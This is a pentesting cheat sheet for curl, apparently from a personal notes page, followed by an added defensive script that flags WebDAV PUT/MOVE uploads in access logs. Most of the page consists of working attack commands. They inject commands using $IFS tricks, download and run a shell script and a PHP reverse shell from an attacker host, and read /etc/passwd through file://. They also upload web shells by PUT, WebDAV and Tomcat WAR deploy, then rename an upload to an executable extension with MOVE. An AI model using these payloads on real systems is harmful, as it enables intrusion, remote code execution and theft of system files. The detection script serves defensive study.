Curl

  • Common commands

#   -d, --data            HTTP POST data
#   -f, --fail            Fail silently (no output at all) on HTTP errors
#   -i, --include         Include protocol response headers in the output
#   -o, --output          Write to file instead of stdout
#   -O, --remote-name     Write output to a file named as the remote file
#   -s, --silent          Silent mode
#   -T, --upload-file     Transfer local FILE to destination
#   -A, --user-agent      Send User-Agent <name> to server
#   -v, --verbose         Make the operation more talkative
#   -V, --version         Show version number and quit
#   -u, --user <user:password>  Server user and password

## ------------------| REST API
curl -s -X GET -G "http://10.10.178.30:31331/ping" --data-urlencode 'ip= `man cat`'

## ------------------| Download file
curl http://10.10.14.26/shell.sh -o /tmp/shell.sh

## ------------------| Read local files
curl file:///etc/passwd

## ------------------| Execute commands
curl http://10.10.14.26/$(whoami)
curl http://10.10.14.26/$(which$IFS'curl')
curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/var/www/html/rev.php'$IFS'http://10.10.14.26/rev.php')   

curl http://10.10.14.26/$(curl$IFS'-o'$IFS'/tmp/shell.sh'$IFS'http://10.10.14.26/shell.sh')
curl http://10.10.14.26/$(bash$IFS/tmp/shell.sh)

  • Use PUT command to upload file

# -d @file strips CR/LF from the file; --data-binary sends it unchanged
curl -X PUT http://10.10.10.15/h4rithd.html -d @shell.aspx
curl -X PUT http://10.10.10.15/harith.txt --data-binary @cmdasp.aspx

# If WebDAV is available
curl -u 'username:password' --upload-file shell.php http://10.10.10.67/webdav_test_inception/shell.php
curl -u 'username:password' -X PUT http://10.10.10.67/webdav_test_inception/shell.php --data-binary @shell.php

# Upload war file to tomcat (URL quoted so the shell does not treat '?' as a glob)
curl -u 'username:password' -T shell.war 'http://10.10.10.10:8080/manager/text/deploy?path=/h4rithd'

  • Use MOVE command to move file

curl -X MOVE http://10.10.10.15/h4rithd.html -H 'Destination:http://10.10.10.15/h4rithd.aspx'
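
From the defender's side, the PUT and MOVE uploads above leave a recognisable trace in the web server's access log. The script below is an added example, not part of the original page: it assumes combined log format, and the sample log lines, the extension list and the function names are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag WebDAV-style upload patterns in an access log.
# Assumption: combined log format (IP ... "METHOD /path HTTP/x" status ...).

# Assumed list of extensions the server would execute; adjust per stack.
EXEC_EXT='[.](asp|aspx|php|jsp|war)$'

# Constructed sample log (documentation IP range, invented paths).
sample_log() {
cat <<'EOF'
192.0.2.10 - - [01/Jan/2024:10:00:01 +0000] "GET /index.html HTTP/1.1" 200 512 "-" "Mozilla/5.0"
192.0.2.44 - - [01/Jan/2024:10:02:10 +0000] "PUT /notes.html HTTP/1.1" 201 0 "-" "curl/8.4.0"
192.0.2.44 - - [01/Jan/2024:10:02:15 +0000] "MOVE /notes.html HTTP/1.1" 201 0 "-" "curl/8.4.0"
192.0.2.51 - - [01/Jan/2024:10:05:00 +0000] "PUT /dav/upload.php HTTP/1.1" 201 0 "-" "curl/8.4.0"
192.0.2.60 - - [01/Jan/2024:10:06:00 +0000] "PUT /docs/report.txt HTTP/1.1" 403 0 "-" "curl/8.4.0"
192.0.2.61 - - [01/Jan/2024:10:07:00 +0000] "MOVE /docs/old.txt HTTP/1.1" 201 0 "-" "Microsoft-WebDAV-MiniRedir"
EOF
}

# Reads an access log on stdin and prints one alert per finding:
#   EXEC_PUT       accepted PUT straight to an executable extension
#   PUT_THEN_MOVE  accepted MOVE of a path the same client PUT earlier
detect_dav_upload() {
  awk -v ext="$EXEC_EXT" '
    {
      method = substr($6, 2)             # drop the opening quote of the request line
      path = $7; sub(/\?.*/, "", path)   # ignore any query string
      status = $9
    }
    status !~ /^2[0-9][0-9]$/ { next }   # only requests the server accepted
    method == "PUT" {
      if (tolower(path) ~ ext) print "EXEC_PUT", $1, path
      else uploaded[$1, path] = 1        # remember for a later MOVE
      next
    }
    method == "MOVE" && (($1, path) in uploaded) {
      print "PUT_THEN_MOVE", $1, path
    }
  '
}

sample_log | detect_dav_upload
```

The MOVE target is carried in the `Destination` header, which combined log format does not record, so the rule keys on the PUT/MOVE pairing rather than the new file name.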

  • .curlrc file

## ------------------| Setup proxy
proxy = http://127.0.0.1:8080        

Last updated 1 year ago
